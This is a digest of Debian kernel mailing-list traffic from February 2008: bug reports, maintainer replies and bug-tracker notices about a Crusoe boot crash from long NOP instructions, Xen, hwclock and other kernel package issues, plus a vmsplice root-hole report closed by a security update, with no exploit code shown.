To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread Bastian Blank
On Tue, Feb 12, 2008 at 01:42:50PM -0800, H. Peter Anvin wrote:
 The Crusoe code morphing software apparently doesn't recognize these 
 long noops, and (presumably) the rest of the hinting NOOP group.  gcc 
 didn't use to generate them, and Crusoe/Efficeon generally do not 
 benefit from code alignment anyway.  I suspect the best thing to do is 
 to use either a 586 kernel or build a dedicated Crusoe kernel without 
 code alignment.

Crusoe is explicitely marked as 586 with TSC in the kernel config.

Bastian

-- 
Either one of us, by himself, is expendable.  Both of us are not.
-- Kirk, The Devil in the Dark, stardate 3196.1



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465501: marked as done (/var/lib/linux-image-2.6.24-1-xen-686/xen-versions empty)

2008-02-12 Thread Debian Bug Tracking System

Your message dated Wed, 13 Feb 2008 00:59:51 +0100
with message-id [EMAIL PROTECTED]
and subject line Re: Bug#465501: 
/var/lib/linux-image-2.6.24-1-xen-686/xen-versions empty
has caused the Debian Bug report #465501,
regarding /var/lib/linux-image-2.6.24-1-xen-686/xen-versions empty
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465501: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465501
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: linux-image-2.6.24-1-xen-686
Version: 2.6.24-3
Severity: normal
File: /var/lib/linux-image-2.6.24-1-xen-686/xen-versions

Hello,

in the package linux-image-2.6.24-1-xen-686 the file
/var/lib/linux-image-2.6.24-1-xen-686/xen-versions is empty and so
update-grub doesn't add 

Xen 3.0.3-1-i386-pae / Debian GNU/Linux, kernel 2.6.24-1-xen-686

to /boot/grub/menu.lst.

I tried to understand how xen-versions is generated, but I gave up, so I
have no patch for you.

Best regards
Uwe

-- System Information:
Debian Release: 4.0
  APT prefers proposed-updates
  APT policy: (900, 'proposed-updates'), (900, 'stable'), (300, 
'testing-proposed-updates'), (300, 'testing'), (200, 'unstable'), (2, 
'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-xen-686
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

Versions of packages linux-image-2.6.24-1-xen-686 depends on:
ii  initramfs-tools   0.85h  tools for generating an initramfs
ii  linux-modules-2.6.24-1-xen-68 2.6.24-3   Linux 2.6.24 modules on i686

Versions of packages linux-image-2.6.24-1-xen-686 recommends:
ii  libc6-xen 2.7-6  GNU C Library: Shared libraries [X

-- no debconf information


---End Message---
---BeginMessage---
No bug. This package does not support lagecy boot protocol.

This is the fourth bug.

Bastian

---End Message---


Processed: severity of 464962 is important

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.26
 severity 464962 important
Bug#464962: -686 build uses long noops, that are unsupported by Transmeta 
Crusoe, immediate crash on boot
Severity set to `important' from `serious'


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464191: Sound broken with linux-image-2.6.24-1-686

2008-02-12 Thread Rob Bochan
So now I've got to recompile my kernel just to have sound?
How nice. I haven't had to do that since about 1998. I guess this is good 
enough reason as any to remove Debian from my laptop. Sad too, it's been 
Debian since before Woody was released.

...Rob



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 465543 to linux-2.6

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.15
 reassign 465543 linux-2.6
Bug#465543: vmsplice local root exploit on nvidia-kernel-2.6.18-5-486|686, 
CVE-2008-0163, CVE-2008-0600.
Bug reassigned from package `nvidia-kernel-2.6.18-5-486' to `linux-2.6'.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465543: marked as done (vmsplice local root exploit on nvidia-kernel-2.6.18-5-486|686, CVE-2008-0163, CVE-2008-0600.)

2008-02-12 Thread Debian Bug Tracking System

Your message dated Tue, 12 Feb 2008 21:13:57 -0700
with message-id [EMAIL PROTECTED]
and subject line Re: Bug#465543: vmsplice local root exploit on 
nvidia-kernel-2.6.18-5-486|686, CVE-2008-0163, CVE-2008-0600.
has caused the Debian Bug report #465543,
regarding vmsplice local root exploit on nvidia-kernel-2.6.18-5-486|686, 
CVE-2008-0163, CVE-2008-0600.
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465543: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465543
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: nvidia-kernel-2.6.18-5-486
Version: 1.0.8776+6etch1
Severity: critical
Tags: security
Justification: root security hole

I tested the current exploits published on securityfocus and all get me
a root shell from non privileged account. I would be glad if you can
patch this package.

-- System Information:
Debian Release: 4.0
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-686
Locale: LANG=en_US, LC_CTYPE= (charmap=ISO-8859-1)

Versions of packages nvidia-kernel-2.6.18-5-486 depends on:
ii  linux-image-2.6.18-5-48 2.6.18.dfsg.1-17 Linux 2.6.18 image on x86
ii  nvidia-kernel-common20051028+1   NVIDIA binary kernel module common

nvidia-kernel-2.6.18-5-486 recommends no packages.

-- debconf-show failed


---End Message---
---BeginMessage---
Version: 2.6.18.dfsg.1-18etch1

On Tue, Feb 12, 2008 at 09:58:52PM -0600, Vicm3 wrote:
 Package: nvidia-kernel-2.6.18-5-486
 Version: 1.0.8776+6etch1
 Severity: critical
 Tags: security
 Justification: root security hole
 
 I tested the current exploits published on securityfocus and all get me
 a root shell from non privileged account. I would be glad if you can
 patch this package.

 http://www.debian.org/security/2008/dsa-1494


-- 
dann frazier


---End Message---


Processing of linux-2.6_2.6.18.dfsg.1-18etch1_sparc.changes

2008-02-12 Thread Archive Administrator
linux-2.6_2.6.18.dfsg.1-18etch1_sparc.changes uploaded successfully to localhost
along with the files:
  linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch1_sparc.deb
  linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch1_sparc.deb

Greetings,

Your Debian queue daemon


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#463606: Fails on my VIA box as well

2008-02-12 Thread Arie Skliarouk
The linux-image-2.6.24-1-686_2.6.24-3_i386.deb fails the same way on my VIA
Nehemiah (C3) motherboard. On the other machine (Intel 440BX, PentiumIII
600MHz) the kernel works fine though.

-- 
Arie


Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread H. Peter Anvin

Bastian Blank wrote:

On Tue, Feb 12, 2008 at 01:42:50PM -0800, H. Peter Anvin wrote:

Okay, the faulting instruction is the following:
c0383360:   0f 1f 40 00 nopl   0x0(%eax)


include/asm-x86/nops.h:
| /* P6 nops */
| /* uses eax dependencies (Intel-recommended choice) */
[...]
| #define P6_NOP4 .byte 0x0f,0x1f,0x40,0\n



Yes, which requires a 686-class machine; gcc is also free to use these 
for -m686, so there is a userspace-visible difference, and thus the hack 
to call Crusoe a 686-class machine is not correct.


Unfortunately there is no CPUID flag for these, only the CPU level.

-hpa



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465512: linux-image-2.6.18-6-amd64: broken symlink /lib/modules/2.6.18-6-amd64/source

2008-02-12 Thread maximilian attems
On Tue, Feb 12, 2008 at 12:55:45PM -0800, Michael Braden wrote:
 
 When installing the kernel package I get a message:
  Hmm. The package shipped with a symbolic link 
 /lib/modules/2.6.18-6-amd64/source
  However, I can not read the target: No such file or directory
  Therefore, I am deleting /lib/modules/2.6.18-6-amd64/source
 
 Examining the package with dpkg-deb -c shows:
 lrwxrwxrwx root/root 0 2008-02-10 10:17 
 ./lib/modules/2.6.18-6-amd64/source - 
 /home/blank/debian/kernel/release/linux-2.6/linux-2.6-2.6.18.dfsg.1/debian/build/build-amd64-none-amd64
 
 /home/blank doesn't exist on my system. This seems to be left over from the
 build proccess. I'm not sure if this link is used elsewhere, if so it
 might cause other problems.
 I recall having seen this message in previous upgrades so it likely
 affects other kernel packages.

thanks for reminder, nuked that useless warning for 2.6.25-1
very harmless.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 463716 is important, reassign 463716 to linux-2.6, merging 463716 386226

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.16
 severity 463716 important
Bug#463716: linux-image-2.6.24-1-686: hwclock fails without --directisa
Bug#464910: hwclock doesn't work with this kernel
Severity set to `important' from `normal'

 reassign 463716 linux-2.6
Bug#463716: linux-image-2.6.24-1-686: hwclock fails without --directisa
Bug#464910: hwclock doesn't work with this kernel
Bug reassigned from package `linux-image-2.6.24-1-686' to `linux-2.6'.

 merge 463716 386226
Bug#386226: linux-image-2.6.16-2-686-smp: Will not set clock and loses 
interrupts when rtc is used
Bug#463716: linux-image-2.6.24-1-686: hwclock fails without --directisa
Bug#398449: /sbin/hwclock: fails to use RTC, hence 1 hour shift in my TZ
Bug#464910: hwclock doesn't work with this kernel
Merged 386226 398449 463716 464910.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464910: FWD: time messed up since last kernel update

2008-02-12 Thread Joey Hess
Perhaps it's time to upgrade this bug to serious?

- Forwarded message from Douglas A. Tutty [EMAIL PROTECTED] -

From: Douglas A. Tutty [EMAIL PROTECTED]
Date: Tue, 12 Feb 2008 08:21:26 -0500
To: [EMAIL PROTECTED]
Subject: time messed up since last kernel update
User-Agent: Mutt/1.5.13 (2006-08-11)

I'm running Etch-amd64 and updated the kernel yesterday.  I shutdown the
computer nightly.

Today, when I booted up and read the daily report from anacron, I get
lots of message from logrotate about logs being rotated are in the
future.  The new logs are dated 2005.  I pon'ed the internet and ntp
reset the clock.  Here's a segment of syslog.  You can see that prior to
ntp setting the clock, the computer thought that it was Dec 31.


Dec 31 19:44:54 titan ntpd[5610]: ntpd exiting on signal 15
Dec 31 19:44:56 titan ntpd[6973]: ntpd [EMAIL PROTECTED] Sun Mar  4 13:05:22 
UTC 2007 (1)
Dec 31 19:44:56 titan ntpd[6974]: precision = 1.000 usec
Dec 31 19:44:56 titan ntpd[6974]: Listening on interface wildcard, 0.0.0.0#123 
Disabled
Dec 31 19:44:56 titan ntpd[6974]: Listening on interface wildcard, ::#123 
Disabled
Dec 31 19:44:56 titan ntpd[6974]: Listening on interface lo, ::1#123 Enabled
Dec 31 19:44:56 titan ntpd[6974]: Listening on interface eth1, 
fe80::217:31ff:fecb:efeb#123 Enabled
Dec 31 19:44:56 titan ntpd[6974]: Listening on interface lo, 127.0.0.1#123 
Enabled
Dec 31 19:44:56 titan ntpd[6974]: Listening on interface eth1, 192.168.1.1#123 
Enabled
Dec 31 19:44:56 titan ntpd[6974]: Listening on interface ppp0, 209.29.44.1#123 
Enabled
Dec 31 19:44:56 titan ntpd[6974]: kernel time sync status 0040
Dec 31 19:44:56 titan ntpd[6974]: frequency initialized -35.886 PPM from 
/var/lib/ntp/ntp.drift
Dec 31 19:45:06 titan ntpd_initres[5629]: parent died before we finished, 
exiting
Feb 12 08:06:47 titan ntpd[6974]: synchronized to 132.246.168.164, stratum 2
Feb 12 08:06:47 titan ntpd[6974]: time reset +66745300.210157 s
Feb 12 08:06:47 titan ntpd[6974]: kernel time sync enabled 0001

Did anybody else have this problem?  I guess I'll see if there's a
problem tomorrow.

In case it matters, this is an Athlon64 3800+, socket AM2, on an Asus
M2N-SLI Deluxe MB (nVidia chipset uses Forcedeth driver) with 1 GB ram.

Doug.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED] 
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]


- End forwarded message -
-- 
see shy jo


signature.asc
Description: Digital signature


Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread Joey Hess
H. Peter Anvin wrote:
 Okay, the faulting instruction is the following:

 c0383360:   0f 1f 40 00 nopl   0x0(%eax)

 The Crusoe code morphing software apparently doesn't recognize these  
 long noops, and (presumably) the rest of the hinting NOOP group.  gcc  
 didn't use to generate them, and Crusoe/Efficeon generally do not  
 benefit from code alignment anyway.  I suspect the best thing to do is  
 to use either a 586 kernel or build a dedicated Crusoe kernel without  
 code alignment.

If the debian kernel team concurs with this let me know and I'll arrange
for d-i to install the -486 build for crusoe.

(Will suck for upgraders tho..)

-- 
see shy jo


signature.asc
Description: Digital signature


Re: .24-rc7 defaults to pata?

2008-02-12 Thread Mikko Rapeli
On this etch host rc8 went with pata too, but 2.6.24-4 goes back to ide
drivers on default ramdisk etc settings. Great, but was this fixed by
upstream or some Debian change which I missed from the changelog?

-Mikko


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: retitle 464962 to -686 build uses long noops, that are unsupported by Transmeta Crusoe, immediate crash on boot

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.16
 retitle 464962 -686 build uses long noops, that are unsupported by Transmeta 
 Crusoe, immediate crash on boot
Bug#464962: immediate crash on boot on TM5800
Changed Bug title to `-686 build uses long noops, that are unsupported by 
Transmeta Crusoe, immediate crash on boot' from `immediate crash on boot on 
TM5800'.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: bug 464962 is forwarded to [EMAIL PROTECTED]

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.16
 forwarded 464962 [EMAIL PROTECTED]
Bug#464962: immediate crash on boot on TM5800
Noted your statement that Bug has been forwarded to [EMAIL PROTECTED]


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread Joey Hess
H. Peter Anvin wrote:
 maximilian attems wrote:
 On Tue, Feb 12, 2008 at 12:32:27PM -0800, H. Peter Anvin wrote:
 INT 6 is #UD, undefined instruction.

 If you could send me a copy of your vmlinux file (not bzImage), it 
 would speed things up.

 cp -l src/linux-2.6-2.6.24/debian/build/build_i386_none_686/vmlinux 
 ~/public_html/

 http://charm.itp.tuwien.ac.at/~mattems/
  

 Are you sure that build matches the bug report?

 The EIP given falls inside the .data segment of that kernel,  
 specifically inside the symbol init_task.

The stack trace I copied down originally was for a 2.6.24 kernel. I can
copy down the one .25-pre if that'd be useful, but it sounds like you're
reproduced it on your own.

(I'm raising the priority of this bug report since it sounds like it
affects more than just my hardware.)

-- 
see shy jo


signature.asc
Description: Digital signature


Bug#464933: r8169 doesn't work with 2.6.24.2

2008-02-12 Thread Robert Joop
please refer to bug #465510 for the same problem, with more info attached.

thanks!



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread maximilian attems
On Tue, Feb 12, 2008 at 01:14:04PM -0800, H. Peter Anvin wrote:
 
 Are you sure that build matches the bug report?

urrgs right sorry, the posted vmlinux is a newer 
2.6.24-git22 and not  Version: 2.6.24-3
 
 The EIP given falls inside the .data segment of that kernel, 
 specifically inside the symbol init_task.
 
   -hpa

will rebuild aboves.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processing of redhat-cluster_2.20080212-1_amd64.changes

2008-02-12 Thread Archive Administrator
redhat-cluster_2.20080212-1_amd64.changes uploaded successfully to localhost
along with the files:
  redhat-cluster_2.20080212-1.dsc
  redhat-cluster_2.20080212.orig.tar.gz
  redhat-cluster_2.20080212-1.diff.gz
  cman_2.20080212-1_amd64.deb
  libcman2_2.20080212-1_amd64.deb
  libcman-dev_2.20080212-1_amd64.deb
  libdlm2_2.20080212-1_amd64.deb
  libdlm-dev_2.20080212-1_amd64.deb
  gfs-tools_2.20080212-1_amd64.deb
  gfs2-tools_2.20080212-1_amd64.deb
  gnbd-client_2.20080212-1_amd64.deb
  gnbd-server_2.20080212-1_amd64.deb
  rgmanager_2.20080212-1_amd64.deb
  redhat-cluster-suite_2.20080212-1_all.deb
  redhat-cluster-source_2.20080212-1_all.deb

Greetings,

Your Debian queue daemon


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread H. Peter Anvin

maximilian attems wrote:

On Tue, Feb 12, 2008 at 12:32:27PM -0800, H. Peter Anvin wrote:

INT 6 is #UD, undefined instruction.

If you could send me a copy of your vmlinux file (not bzImage), it would 
speed things up.


cp -l src/linux-2.6-2.6.24/debian/build/build_i386_none_686/vmlinux 
~/public_html/

http://charm.itp.tuwien.ac.at/~mattems/
 


Are you sure that build matches the bug report?

The EIP given falls inside the .data segment of that kernel, 
specifically inside the symbol init_task.


-hpa



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread H. Peter Anvin

maximilian attems wrote:

On Tue, Feb 12, 2008 at 01:14:04PM -0800, H. Peter Anvin wrote:

Are you sure that build matches the bug report?


urrgs right sorry, the posted vmlinux is a newer 
2.6.24-git22 and not  Version: 2.6.24-3
 
The EIP given falls inside the .data segment of that kernel, 
specifically inside the symbol init_task.


-hpa


will rebuild aboves.


Okay, the faulting instruction is the following:

c0383360:   0f 1f 40 00 nopl   0x0(%eax)

The Crusoe code morphing software apparently doesn't recognize these 
long noops, and (presumably) the rest of the hinting NOOP group.  gcc 
didn't use to generate them, and Crusoe/Efficeon generally do not 
benefit from code alignment anyway.  I suspect the best thing to do is 
to use either a 586 kernel or build a dedicated Crusoe kernel without 
code alignment.


-hpa




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread H. Peter Anvin

maximilian attems wrote:

On Tue, Feb 12, 2008 at 01:14:04PM -0800, H. Peter Anvin wrote:

Are you sure that build matches the bug report?


urrgs right sorry, the posted vmlinux is a newer 
2.6.24-git22 and not  Version: 2.6.24-3
 
The EIP given falls inside the .data segment of that kernel, 
specifically inside the symbol init_task.


-hpa


will rebuild aboves.


Don't worry about it, already have reproduced it.

-hpa



--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464523: linux-image-2.6.24-1-amd64: b43 needs patches for kernel 2.6.24

2008-02-12 Thread Andreas Richter
Am Dienstag, 12. Februar 2008 20:52:52 schrieb maximilian attems:

 quick edit in /etc/kerneloops.conf and reboot into faulty kernel.
 so upstream will be notified on your oops.

Done:
http://www.kerneloops.org/raw.php?rawid=3645msgid=


 i don't like the tainted flag, why does that come?

No idea. Sorry.


-- 
Andreas Richter 
URLs: http://ar.oszine.de | http://www.oszine.de
GPG-KeyID: 0x7BA12DD9
Fingerprint: D2E9 202B F4F0 EB16 25DE 5FF7 0CF2 3C57 7BA1 2DD9


signature.asc
Description: This is a digitally signed message part.


Bug#465508: linux-image-2.6.24-1-686: Kernel freeze all system

2008-02-12 Thread Rafael
Package: linux-image-2.6.24-1-686
Version: 2.6.24-4
Severity: grave
Justification: renders package unusable

Using Debian Sid and linux-image-2.6.24-686:
System is complete freeze when amsn application starts session.
Amsn works well with previous linux images as like as 2.6.22-3-686.

When system is freeze, I press Alt + Impr + b and kernel do not reboot.

-- Package-specific info:

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/1 CPU core)
Locale: LANG=es_ES.UTF-8, LC_CTYPE=es_ES.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages linux-image-2.6.24-1-686 depends on:
ii  debconf [debconf-2.0]1.5.19  Debian configuration management sy
ii  initramfs-tools [linux-initr 0.91d   tools for generating an initramfs
ii  module-init-tools3.3-pre11-4 tools for managing Linux kernel mo

Versions of packages linux-image-2.6.24-1-686 recommends:
ii  libc6-i6862.7-6  GNU C Library: Shared libraries [i

-- debconf information:
  shared/kernel-image/really-run-bootloader: true
  linux-image-2.6.24-1-686/preinst/overwriting-modules-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/bootloader-error-2.6.24-1-686:
  linux-image-2.6.24-1-686/postinst/create-kimage-link-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/old-system-map-link-2.6.24-1-686: true
  linux-image-2.6.24-1-686/prerm/would-invalidate-boot-loader-2.6.24-1-686: true
  linux-image-2.6.24-1-686/preinst/initrd-2.6.24-1-686:
  linux-image-2.6.24-1-686/preinst/failed-to-move-modules-2.6.24-1-686:
  linux-image-2.6.24-1-686/postinst/depmod-error-initrd-2.6.24-1-686: false
  linux-image-2.6.24-1-686/preinst/bootloader-initrd-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/old-initrd-link-2.6.24-1-686: true
  linux-image-2.6.24-1-686/preinst/lilo-has-ramdisk:
  linux-image-2.6.24-1-686/postinst/old-dir-initrd-link-2.6.24-1-686: true
  linux-image-2.6.24-1-686/preinst/abort-install-2.6.24-1-686:
  linux-image-2.6.24-1-686/prerm/removing-running-kernel-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/depmod-error-2.6.24-1-686: false
  linux-image-2.6.24-1-686/preinst/abort-overwrite-2.6.24-1-686:
  linux-image-2.6.24-1-686/preinst/elilo-initrd-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/bootloader-test-error-2.6.24-1-686:
  linux-image-2.6.24-1-686/postinst/kimage-is-a-directory:
  linux-image-2.6.24-1-686/preinst/lilo-initrd-2.6.24-1-686: true



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464523: linux-image-2.6.24-1-amd64: b43 needs patches for kernel 2.6.24

2008-02-12 Thread Michael Buesch
On Tuesday 12 February 2008 20:52:52 maximilian attems wrote:
  b43-phy2: Broadcom 4311 WLAN found

Get a recent wireless-2.6 kernel to get the device working.

-- 
Greetings Michael.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465501: /var/lib/linux-image-2.6.24-1-xen-686/xen-versions empty

2008-02-12 Thread Uwe Kleine-König
Package: linux-image-2.6.24-1-xen-686
Version: 2.6.24-3
Severity: normal
File: /var/lib/linux-image-2.6.24-1-xen-686/xen-versions

Hello,

in the package linux-image-2.6.24-1-xen-686 the file
/var/lib/linux-image-2.6.24-1-xen-686/xen-versions is empty and so
update-grub doesn't add 

Xen 3.0.3-1-i386-pae / Debian GNU/Linux, kernel 2.6.24-1-xen-686

to /boot/grub/menu.lst.

I tried to understand how xen-versions is generated, but I gave up, so I
have no patch for you.

Best regards
Uwe

-- System Information:
Debian Release: 4.0
  APT prefers proposed-updates
  APT policy: (900, 'proposed-updates'), (900, 'stable'), (300, 
'testing-proposed-updates'), (300, 'testing'), (200, 'unstable'), (2, 
'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-6-xen-686
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

Versions of packages linux-image-2.6.24-1-xen-686 depends on:
ii  initramfs-tools   0.85h  tools for generating an initramfs
ii  linux-modules-2.6.24-1-xen-68 2.6.24-3   Linux 2.6.24 modules on i686

Versions of packages linux-image-2.6.24-1-xen-686 recommends:
ii  libc6-xen 2.7-6  GNU C Library: Shared libraries [X

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread maximilian attems
On Tue, Feb 12, 2008 at 02:52:54PM -0500, Joey Hess wrote:
 maximilian attems wrote:
  thanks for quick feedback, have prebuild 2.6.25-rc1-git2
  (they contain the security fix, but don't seem to suspend here)
  anyway please test for boot
  - http://charm.itp.tuwien.ac.at/~mattems/2.6.25-rc1-git2/
 
 Still fails the same.
 
  if those again don't boot please file info upstream on
  bugzilla.kernel.org so that relevant new x86 arch maintainer
  fix that up.
 
 Um, could the kernel team forward this bug?

well we have no automated way to do so
as we are underpowered in terms of bug nrs, it is
routine to ask to file upstream. the debian kernel
does not carry any x86 specific patch.
also it is often much easier if upstream speaks directly
with the person that has the hardware at hand.
 
 * I don't have an account on this bugzilla, or actually, on any bugzilla
   on earth.
 * I don't know exactly what versions you've had me test.
 * I guess they'll want to know things about compile options that I don't
   know.

sure, ack.
so i'll circumvent bugzilla and add the new x86 maintainers
on cc to let them know about the 2.6.24 and 2.6.25-rc1 boot error
on shiny fujitsu p700 lifebook, with a Crusoe processor.
http://bugs.debian.org/464962
686 config attached.



config-2.6.24-1-686.bz2
Description: Binary data


Bug#465506: Warnings compiling linux-source-2.6.24

2008-02-12 Thread Max Zimmermann
Package: linux-source-2.6.24
Version: 2.6.24-4

When I compile the kernel and modules from linux-source-2.6.24-4 I
receive the following warning:
arch/x86/kernel/setup64.c: In function ‘setup_per_cpu_areas’:
arch/x86/kernel/setup64.c:103: warning: the address of
‘contig_page_data’ will always evaluate as ‘true’



$ cd /usr/src/linux-source-2.6.24
$ make-kpkg --revision=2.6.24.custom binary modules_image
arch/x86/kernel/setup64.c: In function ‘setup_per_cpu_areas’:
arch/x86/kernel/setup64.c:103: warning: the address of
‘contig_page_data’ will always evaluate as ‘true’

I don't think this is very severe, it might just be that it has to be
'config_page_data' instead of 'contig_page_data'.

I am using Debian GNU/Linux lenny/sid, kernel 2.6.24-1-amd64 and glibc
2.7-6 (libc6_2.7-6_amd64)

Cheers!



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465246: marked as done (user-root exploit in vmsplice())

2008-02-12 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 13:02:15 +
with message-id [EMAIL PROTECTED]
and subject line Bug#464945: fixed in linux-2.6 2.6.24-4
has caused the Debian Bug report #464945,
regarding user-root exploit in vmsplice()
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
464945: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464945
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
